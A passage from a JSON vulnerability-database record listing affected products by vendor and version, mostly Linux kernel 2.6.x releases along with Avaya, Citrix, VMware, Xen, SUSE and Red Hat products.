        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel 2.6.27-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel 2.6.36-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "linux enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel 2.6.35-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel 2.6.28-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.6"
      },
      {
        "model": "kernel 2.6.33-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.51"
      },
      {
        "model": "xenserver common criteria",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "aura system manager sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel 2.6.34-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel 2.6.37-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.5"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "kernel 2.6.34-rc2-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37"
      },
      {
        "model": "kernel rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.2"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel 2.6.39-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.3"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel git",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.216"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "hat enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel 2.6.33-rc6-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.28-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "communication server 1000m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel 2.6.34-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel git3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3113"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.5"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel git",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.217"
      },
      {
        "model": "kernel 2.6.37-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel 2.6.34-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel 2.6.38-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "xenserver",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.6"
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel 2.6.38-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura system manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "communication server 1000m signaling server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "communication server 1000e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "xensource",
        "version": "3.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
